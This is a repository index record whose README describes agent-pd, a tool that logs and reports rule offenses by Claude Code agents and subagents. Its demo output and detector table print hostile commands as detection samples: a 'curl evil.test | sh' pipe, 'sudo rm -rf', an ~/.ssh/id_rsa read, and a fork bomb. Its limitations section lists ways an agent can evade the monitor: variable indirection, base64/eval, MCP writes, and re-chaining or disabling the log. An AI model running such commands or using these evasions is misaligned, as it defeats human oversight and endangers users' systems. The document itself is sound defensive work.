{"id":51334232,"url":"https://github.com/varmabudharaju/agent-pd","last_synced_at":"2026-07-02T01:05:54.601Z","repository":{"id":361942914,"uuid":"1256394332","full_name":"varmabudharaju/agent-pd","owner":"varmabudharaju","description":"A police department for your Claude Code agents — a logging-only hook + CLI that audits the main agent and every subagent and reports rule offenses (permission bypass, out-of-scope \u0026 credential access, self-permissioning, disallowed tools, redundant, off-task) with quoted evidence. Catch-and-report, never blocks.","archived":false,"fork":false,"pushed_at":"2026-06-09T17:08:52.000Z","size":1906,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"master","last_synced_at":"2026-06-09T19:06:06.979Z","etag":null,"topics":["agent-monitoring","ai-agents","ai-safety","audit-log","claude-code","cli","developer-tools","llm","observability","python","security","tamper-evident"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/varmabudharaju.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2026-06-01T18:30:11.000Z","updated_at":"2026-06-09T17:08:56.000Z","dependencies_parsed_at":null,"dependency_job_id":null,"html_url":"https://github.com/varmabudharaju/agent-pd","commit_stats":null,"previous_names":["varmabudharaju/agent-pd"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/v
armabudharaju/agent-pd","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/varmabudharaju%2Fagent-pd","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/varmabudharaju%2Fagent-pd/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/varmabudharaju%2Fagent-pd/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/varmabudharaju%2Fagent-pd/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/varmabudharaju","download_url":"https://codeload.github.com/varmabudharaju/agent-pd/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/varmabudharaju%2Fagent-pd/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":35028671,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-26T15:22:16.424Z","status":"online","status_checked_at":"2026-07-01T02:00:05.325Z","response_time":130,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["agent-monitoring","ai-agents","ai-safety","audit-log","claude-code","cli","developer-tools","llm","observability","python","security","tamper-evident"],"created_at":"2026-07-02T01:05:53.999Z","updated_at":"2026-07-02T01:05:54.589Z","avatar_url":"https://github.com/varmabudharaju.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003cdiv align=\"center\"\u003e\n\n# 
agent-pd\n\n### A police department for your Claude Code agents\n\nA logging-only hook records every tool \u0026amp; permission event from the main agent **and** its\nsubagents; the `pd` CLI replays that log through six detectors and reports rule offenses with\nquoted evidence. **Catch-and-report — it never blocks.**\n\n[![License: Apache 2.0](https://img.shields.io/badge/License-Apache_2.0-blue.svg)](https://github.com/varmabudharaju/agent-pd/blob/master/LICENSE)\n[![Python 3.11+](https://img.shields.io/badge/Python-3.11%2B-3776AB.svg?logo=python\u0026logoColor=white)](https://github.com/varmabudharaju/agent-pd/blob/master/pyproject.toml)\n[![Tests](https://img.shields.io/badge/tests-474_passing-brightgreen.svg)](https://github.com/varmabudharaju/agent-pd/tree/master/docs/manual-tests/)\n[![Version](https://img.shields.io/badge/version-0.2.0-orange.svg)](https://github.com/varmabudharaju/agent-pd/blob/master/pyproject.toml)\n[![Runtime deps](https://img.shields.io/badge/runtime_deps-PyYAML_only-lightgrey.svg)](https://github.com/varmabudharaju/agent-pd/blob/master/pyproject.toml)\n\n**[Quickstart](#quickstart)** · **[How it works](#how-it-works-mental-model)** · **[Detectors](#the-detectors)** · **[Architecture](https://github.com/varmabudharaju/agent-pd/blob/master/ARCHITECTURE.md)** · **[Security](https://github.com/varmabudharaju/agent-pd/blob/master/SECURITY.md)**\n\n\u003c/div\u003e\n\n## Caught on camera\n\n\u003e The department's body-cam. 
agent-pd won't stop the heist — but every move your agents make ends up on the record.\n\n\u003cdiv align=\"center\"\u003e\n\n\u003ca href=\"https://github.com/varmabudharaju/agent-pd/raw/master/docs/demo.mp4\"\u003e\u003cimg src=\"https://raw.githubusercontent.com/varmabudharaju/agent-pd/master/docs/demo.gif\" width=\"80%\" alt=\"agent-pd demo — the police scanner catching agents in the act\"\u003e\u003c/a\u003e\n\n\u003csub\u003e\u003ci\u003e▶ \u003ca href=\"https://github.com/varmabudharaju/agent-pd/raw/master/docs/demo.mp4\"\u003eWatch the full clip with sound\u003c/a\u003e\u003c/i\u003e\u003c/sub\u003e\n\n\u003c/div\u003e\n\n![capture vs. read](https://raw.githubusercontent.com/varmabudharaju/agent-pd/master/docs/diagrams/02-two-phase-flow.png)\n\n\u003e **Flight recorder + police scanner, not a firewall.** If you need to *stop* an action, that\n\u003e stays with Claude Code's permission prompts or an OS sandbox. agent-pd tells you what an agent\n\u003e did — faithfully, after the fact or live as it happens.\n\n**Highlights**\n\n- **Covers the main agent + every subagent**, including those spawned by Claude Code's new\n  dynamic **Workflow** tool (verified against recorded `workflow-subagent` hook events).\n- **Six deterministic detectors** at **zero token cost** — denied calls, out-of-scope \u0026amp;\n  credential access, permission bypass, self-permissioning, disallowed tools, off-task work.\n- **Tamper-evident audit log** (hash-chained) with an optional **off-host append-only sink**.\n- **Sessions are named, not UUIDs** — `pd list` and `pd watch` show each session's project\n  directory and first user prompt, derived from data already in the logs (works retroactively).\n- **Honest by design** — it raises the bar; it is **not** a sandbox. 
See [SECURITY.md](https://github.com/varmabudharaju/agent-pd/blob/master/SECURITY.md).\n\n**What it looks like** — `pd watch --all` across three concurrent sessions (three projects,\nmain agents + subagents with their briefs, two genuine flags and one borderline search among\nthe ordinary work):\n\n\u003cimg src=\"https://raw.githubusercontent.com/varmabudharaju/agent-pd/master/docs/screenshots/demo/03-pd-watch-all.png\" width=\"100%\" alt=\"pd watch --all: merged live feed across three sessions — § intro line per session, agent banners with briefs, two genuine flags (a credentials read and a denied curl|sh) and one off_task review\"/\u003e\n\n\u003e Every screenshot in this README is a real Terminal capture of the real engine replaying a\n\u003e seeded three-session fleet — reproduce them yourself with\n\u003e [`examples/demo-sessions.sh`](https://github.com/varmabudharaju/agent-pd/blob/master/examples/demo-sessions.sh).\n\n---\n\n## Why it exists\n\nClaude Code agents can read files, run shell commands, and spawn subagents. Most of that is\nfine — but you usually find out what an agent *actually did* only by scrolling a transcript,\nand **denied calls never reach the transcript at all** (Claude Code kills them first). 
agent-pd\ninstalls a hook that records every event to a per-session audit log, then gives you tools to\nask: *did any agent go out of scope, touch credentials, try to escalate, edit its own config,\nuse a tool it wasn't allowed, or wander off its brief?*\n\n---\n\n## How it works (mental model)\n\n```\n SETUP              CAPTURE (automatic, every session)        READ (per session or --all)\n pd install-hook  →  hook fires on every tool call        →   pd report   (forensic)\n      │                    │                                   pd watch    (live scanner)\n settings.json       ~/.claude/pd/audit/\u003csession\u003e.jsonl        pd judge    (opt-in LLM pass)\n```\n\n\u003cp align=\"center\"\u003e\n  \u003cimg src=\"https://raw.githubusercontent.com/varmabudharaju/agent-pd/master/docs/diagrams/01-system-context.png\" width=\"560\" alt=\"agent-pd system context\"\u003e\n\u003c/p\u003e\n\n\u003e For the full picture — system context, component, sequence, detector-pipeline, and\n\u003e integrity diagrams (with rendered images) — see [ARCHITECTURE.md](https://github.com/varmabudharaju/agent-pd/blob/master/ARCHITECTURE.md).\n\n- **The hook is a dumb, crash-safe recorder.** Registered globally in `~/.claude/settings.json`\n  on PostToolUse / PermissionDenied / SubagentStart / SubagentStop. On each event it appends one\n  normalized, hash-chained line to a **per-session** audit file and **always exits 0** — it never\n  blocks, never loses an event, records all sessions concurrently.\n- **All the intelligence is in the reader.** `pd report` / `pd watch` correlate the audit log\n  (plus subagent transcripts and `meta.json` briefs) into per-agent records and run the\n  detectors. 
Zero LLM tokens — pure Python.\n- **Denied calls only exist in the audit log** — which is *why* the hook exists instead of just\n  parsing transcripts.\n\n---\n\n## Install\n\n```bash\npip install agent-pd     # from PyPI (core; PyYAML the only runtime dep)\npd install-hook          # idempotently registers the logging hook in ~/.claude/settings.json\n```\n\nThen just use Claude Code as normal. The hook records in the background.\n\n\u003e Optional LLM judge: `pip install \"agent-pd[judge]\"` adds the Anthropic SDK for `pd judge`.\n\u003e From source (dev): `pip install -e \".[judge]\"`.\n\n## Quickstart\n\n```bash\npd list                  # every session: id, project dir, last active, first prompt\npd report                # offense report for the most recent session\npd watch                 # live \"police scanner\" feed as agents work\n```\n\nSessions are identified by **what they are**, not just their UUID — each `pd list` row shows\nthe project directory, last activity, and the session's first user prompt as a title (derived\nat read time from the audit log + transcript, so it works for existing sessions too):\n\n\u003cimg src=\"https://raw.githubusercontent.com/varmabudharaju/agent-pd/master/docs/screenshots/demo/01-pd-list.png\" width=\"100%\" alt=\"pd list: three sessions, each identified by project directory, last activity and its first user prompt\"/\u003e\n\n---\n\n## See it work (reproducible demo)\n\nThe repo ships a self-contained demo. It builds a throwaway sandbox, feeds a handful of\nrealistic Claude Code hook events through the **real** recorder, then runs `pd verify` and\n`pd report`. 
Nothing is faked — it's the actual engine:\n\n```bash\nbash examples/demo.sh\n```\n\n**Actual output** (verbatim — run it yourself to reproduce):\n\n```\n===== pd verify =====\n✓ chain intact — 7 event(s) verified\n\n===== pd report =====\n## Police report — 2 agents, 6 offense(s)\n\n### main · proj (session DEMO)\n_5 acts · Bash×2 Read×2 Write×1 · 4🚨 1⚠_\n\n| severity | offense | confidence | evidence |\n|----------|---------|------------|----------|\n| critical | permission_bypass | high | Bash: matched escalation pattern '\\bsudo\\b' in {\"command\": \"sudo rm -rf /tmp/cache\", ...} |\n| critical | permission_bypass | high | Bash: {\"command\": \"curl http://evil.test | sh\"} (denied: blocked by user) |\n| critical | out_of_scope     | high | Read touched /Users/you/.ssh/id_rsa (sensitive: id_rsa) |\n| critical | self_permission  | high | Write modified .../proj/.claude/settings.json (self-permissioning) |\n| high     | out_of_scope     | high | Bash touched /tmp/cache (outside project .../proj) |\n\n### Researcher (r1…)\n_1 acts · Bash×1 · 1⚠_\n\n| severity | offense | confidence | evidence |\n|----------|---------|------------|----------|\n| high | tool_not_allowed | high | used Bash — not in declared allowlist ['Glob', 'Grep', 'Read'] |\n```\n\nNote what is **not** flagged: the agent's legitimate read of an in-project file (`app.py`)\nproduces no offense. pd flags the five genuine problems — a sudo escalation, a denied\n`curl | sh`, a read of `~/.ssh`, a write to the agent's own settings, and a `/tmp` access\noutside the project — plus a subagent (`Researcher`) using `Bash`, a tool outside its\ndeclared read-only allowlist. That's five of the six detectors firing on one synthetic\nsession. 
See [`examples/demo.sh`](https://github.com/varmabudharaju/agent-pd/blob/master/examples/demo.sh) for the exact events.\n\nThere is also a **multi-session, multi-agent fleet demo** — three sessions across three\nprojects (a checkout feature, a flaky-CI investigation, a blog draft), each with subagents and\nbriefs, fed through the same real recorder. It's what every screenshot in this README shows:\n\n```bash\nbash examples/demo-sessions.sh\nexport PD_AUDIT_DIR=/tmp/pd-demo-fleet/audit\npd list  --projects-dir /tmp/pd-demo-fleet/projects\npd watch --all --replay --projects-dir /tmp/pd-demo-fleet/projects\n```\n\n`pd report` on the fleet's flaky-CI session — per-agent digest, offense table, quoted evidence:\n\n\u003cimg src=\"https://raw.githubusercontent.com/varmabudharaju/agent-pd/master/docs/screenshots/demo/04-pd-report.png\" width=\"100%\" alt=\"pd report for the orders-api session: per-agent digest and offense table with quoted evidence\"/\u003e\n\n\u003e **Want to verify it on your own real Claude Code session?** Follow the safe ~15-minute\n\u003e hands-on walkthrough in [`docs/manual-tests/TRY-IT-LIVE.md`](https://github.com/varmabudharaju/agent-pd/blob/master/docs/manual-tests/TRY-IT-LIVE.md).\n\n---\n\n## Commands\n\n```bash\npd install-hook                       # register the logging hook (one-time)\npd list                               # every session: id · project · last active · “first prompt”\n\npd report                             # offense report, most recent session\npd report --session \u003cid\u003e --format md  # md | json | both\npd report --verbose                   # full evidence + files-touched per agent\npd report --agent \u003cid|main\u003e           # focus one agent: digest + every action it took\n\npd watch                              # live feed, most recent session — streams NEW activity\n                                      #   from now (like tail -f); existing backlog is skipped\npd watch --replay                     # replay 
the whole session's backlog first, then tail\npd watch --all                        # merged feed across ALL sessions (§session tag; an intro\n                                      #   line names each session's project + first prompt)\npd watch --crimes-only                # quiet unless something's wrong\npd watch --verbose                    # full commands + reasons, no truncation\npd watch --session \u003cid\u003e --no-color --no-emoji   # plain terminals / SSH\n\npd verify                             # check the audit-log hash-chain (most recent session)\npd verify --all                       # verify every session; exit 2 on tamper/truncation\n                                      # set PD_AUDIT_KEY for HMAC-keyed integrity\n\npd judge                              # dry run (free): items / agents / ≈token estimate\npd judge --run --via-claude-code      # confirm off_task flags on your Claude subscription\npd judge --run --model sonnet --max 20    # or via the metered Anthropic API\n\npd compact [--session ID] [--prune-older-than DAYS] [--dry-run]\n                                      # gzip old logs (\u003csid\u003e.jsonl -\u003e .jsonl.gz); skips the active\n                                      # session; lossless for detection. Optional age-based prune.\n\npd sink push [--session ID] [--all]   # forward un-sent chained events off-host (append-only sink)\npd sink status [--session ID] [--all] # forwarded/last per session; flags \"remote ahead\"\n```\n\n---\n\n## The detectors\n\nSix deterministic detectors (zero tokens) plus one opt-in LLM pass.\n\n| Offense | Severity | What it catches | Confidence |\n|---|---|---|---|\n| `permission_bypass` | critical | Denied calls + a **two-tier** Bash scan: never-downgrade catastrophic (`rm -rf /`, fork bomb, `curl\\|sh`, `dd of=/dev/…`) stay critical under any allow-rule; downgradable escalation (sudo, `chmod 777`, cwd-wipe) only by a precise rule. 
| high |\n| `out_of_scope` | high / critical | File **or** Bash path outside the project (auto: git root or cwd), or outside configured `scope_dirs`. Sensitive paths (`~/.ssh`, `~/.aws`, `~/.claude`, `/etc/shadow`, shell history…) are **always critical** and never downgraded. | high |\n| `self_permission` | critical | **Any** agent write to its own control files (`.claude/settings*.json`, `.claude/agents/*.md`, `pd-rules*.yaml`) via any method — Write/Edit/NotebookEdit or Bash `cp`/`mv`/`tee`/`sed`/`python`/`base64`/redirect — regardless of content. | high |\n| `tool_not_allowed` | high | A subagent uses a tool outside its declared `tools:` allowlist (`.claude/agents/\u003ctype\u003e.md`). | high |\n| `redundant` | low | Exact-duplicate tool calls (ignores Bash `description` noise). | high |\n| `off_task` | review | Search/query terms vs. the agent's brief, by word-overlap below a threshold. | **low — heuristic** |\n\nThe five deterministic detectors are trustworthy and free. `off_task` is intentionally noisy\nand hard-labeled low-confidence — the **judge** (below) turns it into high-confidence verdicts.\n\n### Permission-aware severity\n\n`out_of_scope` and escalation hits are **downgraded to a quiet `info` severity** when the action\nmatches a permission **allow-rule** you configured (`permissions.allow` in `~/.claude/settings.json`\nor project `.claude/settings.local.json`) — *authorized → info, unauthorized → full severity*.\n\nMatching is **faithful to Claude Code's own semantics**: shell-operator splitting (a `Bash(git:*)`\nrule does **not** license `git status \u0026\u0026 rm -rf ~`), command-substitution / backtick extraction,\nredirect targets as a separate authorization, word-boundary prefixes (`npm install:*` ≠\n`npm installmalware`), and gitignore-style globs. Ambiguity resolves **conservatively → not\npermitted** (under-flagging is worse than over-flagging). 
Two things are **never** downgraded:\nsensitive-path access and categorically-catastrophic commands. A denied call stays critical\nregardless — a denial is unpermitted by definition.\n\n### The off_task judge (`pd judge`) — opt-in, cost-capped\n\nAn optional LLM pass that reads each agent's brief and its flagged searches, then confirms or\ndrops the noisy `off_task` flags. Built to cost almost nothing:\n\n- **Opt-in** — never runs in the hook or `pd watch`.\n- **Dry-run by default** — prints an estimate; add `--run` to actually call.\n- **Pre-filtered + batched** — only already-flagged items, one API call per agent.\n- **Two backends:** `--via-claude-code` shells out to the headless `claude` CLI (**your Claude\n  subscription, no API key**), or the metered Anthropic API (`pip install -e \".[judge]\"` +\n  `ANTHROPIC_API_KEY`). `--model haiku|sonnet|opus` (default haiku), `--max N`.\n\nIn the demo fleet, the orders-api subagent rabbit-holed into a CI-infra search with zero\nword-overlap against its brief — the heuristic flags it for review, and the dry run prices\nout exactly what confirming it would cost:\n\n\u003cimg src=\"https://raw.githubusercontent.com/varmabudharaju/agent-pd/master/docs/screenshots/demo/07-pd-judge.png\" width=\"100%\" alt=\"pd judge dry run: the off_task heuristic flagged one borderline search; judging it would cost one batched haiku call — nothing runs without --run\"/\u003e\n\n---\n\n## Live view: `pd watch`\n\nA real-time feed of what your agents are doing and which rules they're breaking. 
The header\n**names the session it attached to** — project directory plus the session's first prompt — so\nattaching to the default (most recent) session is never a mystery:\n\n\u003cimg src=\"https://raw.githubusercontent.com/varmabudharaju/agent-pd/master/docs/screenshots/demo/02-pd-watch-header.png\" width=\"100%\" alt=\"pd watch header naming the watched session: its project directory and first prompt, not just the UUID\"/\u003e\n\nEach agent gets a stable color and a banner with its assigned brief; every action is a feed\nline with a severity badge; a live rap-sheet footer tallies crimes per agent. With `--all`\n(merged feed across every session), the feed prints a\n`§sid · project · “title”` intro line the first time a session appears, so interleaved sessions stay easy to tell apart (see the\nfleet screenshot at the top of this README).\n\n`--crimes-only` keeps the feed quiet unless something is actually wrong — only flagged actions\nstream — and Ctrl-C prints a final **rap sheet** tallying every agent in every session:\n\n\u003cimg src=\"https://raw.githubusercontent.com/varmabudharaju/agent-pd/master/docs/screenshots/demo/06-pd-watch-crimes.png\" width=\"100%\" alt=\"pd watch --all --crimes-only: quiet unless something is wrong — only the flagged actions stream, and Ctrl-C prints the final rap sheet tallying every agent in every session\"/\u003e\n\nZero extra dependencies — ANSI only. The full annotated\nscreenshot set lives in [docs/test-evidence.md](https://github.com/varmabudharaju/agent-pd/blob/master/docs/test-evidence.md).\n\n---\n\n## Audit-log integrity \u0026 off-host sink\n\nEvery event carries a `seq` and a `chain = sha256(prev_chain + canonical(event))` (HMAC-SHA256\nif `PD_AUDIT_KEY` is set), computed by the hook under a per-session file lock with a\n`\u003csid\u003e.head.json` anchor. **`pd verify`** recomputes the chain and reports `✓ intact`,\n`✗ TAMPER DETECTED`, or `✗ TRUNCATED` (exit 2); the chain still verifies after `pd compact`. Here it is
Here's it\ncatching both attacks for real — one event deleted from a log's tail, then one byte flipped\ninside a recorded command (the compacted session still verifies):\n\n\u003cimg src=\"https://raw.githubusercontent.com/varmabudharaju/agent-pd/master/docs/screenshots/demo/12-verify-tamper.png\" width=\"100%\" alt=\"pd verify pinpoints both attacks: the truncated session is flagged TRUNCATED, and one flipped byte is flagged TAMPER DETECTED at seq 7, while the compacted session still verifies\"/\u003e\n\nThis is tamper-**evident**, not tamper-**proof**: a same-user agent with Bash can re-chain the\nwhole file. To close the *retroactive-deletion* half of that gap, **`pd sink push`** forwards each\nchained event to an **off-host, append-only destination** (file or http backend; env-only\n`PD_SINK_TOKEN`; `https://` enforced for remote tokens; redirects not followed). Once an event has\nshipped off-host, a later local rewrite can't reach it. **`pd sink status`** flags \"remote ahead\"\nwhen more events shipped than remain locally — a truncation signal:\n\n\u003cimg src=\"https://raw.githubusercontent.com/varmabudharaju/agent-pd/master/docs/screenshots/demo/10-sink-remote-ahead.png\" width=\"100%\" alt=\"pd sink: push all chained events to the off-host sink, status shows fully forwarded; after deleting one local event, status flags remote ahead — possible local tampering\"/\u003e\n\n\u003e Append-only is a **deployment requirement** pd can't enforce, and the sink does not stop a\n\u003e same-user agent from *forging* entries or *disabling* the hook. Read [SECURITY.md](https://github.com/varmabudharaju/agent-pd/blob/master/SECURITY.md)\n\u003e for the full, honest framing before relying on any of this.\n\n---\n\n## What's lacking (honest limitations)\n\nagent-pd **raises the bar; it is not a sandbox.** A determined same-privilege adversary using\nobfuscation or indirection can evade static detection. 
Known limits, in plain terms:\n\n- **Obfuscation / indirection evades static detection.** Multi-level `$VAR` chains\n  (`A=/etc/shadow; B=$A; cat $B` — only single-level expansion is followed), `$IFS` / word-split\n  tricks, two-step download-then-exec (`curl -o f url; sh f`), base64/eval-assembled commands, and\n  dynamically-built paths can slip past.\n- **Non-Bash file-write MCP tools bypass `self_permission`.** Only Write/Edit/NotebookEdit and\n  Bash are inspected for control-file writes; a filesystem MCP tool with a different shape could\n  write `.claude/settings.json` undetected.\n- **`off_task` is heuristic** (word-overlap) and can't run on the main agent or on Workflow\n  subagents (no brief). `pd judge` is the trustworthy path.\n- **`~/.config` sensitivity is broad** and can be noisy (it holds innocuous app config too).\n- **Tool *results* aren't surfaced** — the hook captures `tool_input` and an outcome flag, not full\n  `tool_response`, to keep the audit log from bloating. The feed shows what an agent *did*, not its\n  output.\n- **Audit integrity is tamper-evident, not tamper-proof** (above), and the off-host sink's\n  append-only guarantee is the operator's responsibility.\n- **Symlink resolution is best-effort** (the symlink must exist at analysis time).\n- **Sessions that predate the hook** (transcript-only, no `\u003csid\u003e.jsonl`) don't appear in `pd report`.\n\nThe full ledger of shipped / residual / declined items lives in [KNOWN-GAPS.md](https://github.com/varmabudharaju/agent-pd/blob/master/KNOWN-GAPS.md).\n\n## How it can be improved (roadmap)\n\nPrioritized, none blocking — scoped so any one can be picked up independently:\n\n1. **Tool-agnostic control-file detection** — flag *any* tool whose input names a control path in\n   a write-shaped field (closes the MCP `self_permission` gap).\n2. 
**Multi-level `$VAR` resolution** — iterate variable substitution to a fixed point so 2-hop\n   indirection (`B=$A`) no longer hides a sensitive path.\n3. **Truncate / cap `tool_result`** at capture to keep raw `.jsonl` small.\n4. **Narrow `~/.config` sensitivity** to credential-bearing subpaths (`gh`, `gcloud`, …) to cut noise.\n5. **Sink enhancements** — chunk large backlogs, a syslog backend, and `pd verify --against-sink`\n   read-back reconciliation.\n6. **`pd summary \u003csession\u003e`** — per-agent digest (files touched, time span, tool histogram).\n7. **Judge verdict disk cache** — skip re-judging identical (brief, search) pairs.\n8. **Capture more hook events** (`PostToolUseFailure`, `PreCompact`, `SessionEnd`) to enrich timelines.\n\n---\n\n## Configuration\n\nagent-pd works out of the box with no config — every rule (sensitive paths, escalation\npatterns, severities, the `off_task` threshold) ships as a built-in default. A `pd-rules.yaml`\nfile is **optional**, and only needed to override those defaults.\n\nWhen you do write one, every command **auto-discovers** it — no flag required. On each run `pd`\nlooks for `pd-rules.yaml` in this order and uses the first it finds, deep-merged over the\nbuilt-in defaults:\n\n1. the current directory\n2. the enclosing **project root** (the git root above the cwd)\n3. `~/.claude/pd-rules.yaml` (a global default for all projects)\n\nPrecedence is **`--rules \u003cpath\u003e` › auto-discovered file › built-in defaults** — pass `--rules`\non any command (including `pd watch`) to point at a specific file and override discovery. 
See\n`pd-rules.yaml` in this repo for every supported key (`scope_dirs`, sensitive paths, the two\nescalation tiers, severities, `off_task_overlap_threshold`, `storage`, and a `sink` section).\n\n\u003e Lists in `pd-rules.yaml` **replace** the corresponding default list (deep-merge replaces\n\u003e lists, not appends) — so if you set `sensitive_patterns`, include the built-ins you still want.\n\nThe off-host sink also reads env overrides: `PD_SINK_TYPE=file|http`, `PD_SINK_PATH` /\n`PD_SINK_URL`, `PD_SINK_TIMEOUT`, and the **env-only** `PD_SINK_TOKEN` (ignored if placed in a\nconfig file, so it never lands in a checked-in or world-readable file).\n\n## Storage \u0026 privacy\n\n```\n~/.claude/pd/audit/\u003csid\u003e.jsonl      # live capture (hook appends here)\n~/.claude/pd/audit/\u003csid\u003e.jsonl.gz   # compacted (pd compact, gzip)\n```\n\nThe audit log stores **full tool inputs** — file contents and Bash commands — which **may include\nsecrets in plaintext**. It lives **outside your repo** (won't be committed by accident) but treat\nit like any sensitive local file. `pd compact` gzips, it does **not** encrypt. Nothing is uploaded\nunless you configure a sink. To clear it: `rm ~/.claude/pd/audit/*.jsonl` (it repopulates as\nsessions run).\n\n**Choosing where logs go.** The default is deliberately a hidden, local, non-repo path. To put\nlogs somewhere you choose, set `PD_AUDIT_DIR`, or bake it into the hook at install time:\n\n```bash\npd install-hook --audit-dir ~/agent-pd-logs   # hook + CLI both use this path\n# or, per shell: export PD_AUDIT_DIR=~/agent-pd-logs\n```\n\nBoth the hook (writes) and every `pd` command (reads) honor `PD_AUDIT_DIR` (precedence:\n`--audit-dir` flag › `PD_AUDIT_DIR` › default). 
A **relative** path is resolved to an absolute\none when it's set (the install flag bakes the absolute path; `PD_AUDIT_DIR` is absolutized when\nread), so logs always land in one fixed place instead of scattering into whatever directory each\nagent happens to run in. Still, **don't** point it at a repo folder or a cloud-synced directory\n(iCloud/Dropbox) unless you accept that plaintext tool inputs — possibly secrets — will be\ncommitted or synced off-machine.\n\n## Development\n\n```bash\npip install --user -e .          # core\npip install --user -e \".[judge]\" # + anthropic SDK (only for the API judge backend)\npython3 -m pytest -q             # 474 tests, pure (no API key needed)\n```\n\nTDD throughout; detectors, render, live, and judge are all unit-tested with no network. For the\ndesign in depth: [SYSTEM-DESIGN.md](https://github.com/varmabudharaju/agent-pd/blob/master/SYSTEM-DESIGN.md) (formal design doc — goals, components,\npermission model, trade-offs) and [ARCHITECTURE.md](https://github.com/varmabudharaju/agent-pd/blob/master/ARCHITECTURE.md) (diagrams). Honest\nlimitations and roadmap live in [KNOWN-GAPS.md](https://github.com/varmabudharaju/agent-pd/blob/master/KNOWN-GAPS.md).\n\n## License\n\n[Apache License 2.0](https://github.com/varmabudharaju/agent-pd/blob/master/LICENSE) © Sai Ram Varma Budharaju. Free to use, modify, and distribute (including\ncommercially); retain the copyright and license notice. Includes a patent grant.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvarmabudharaju%2Fagent-pd","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fvarmabudharaju%2Fagent-pd","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvarmabudharaju%2Fagent-pd/lists"}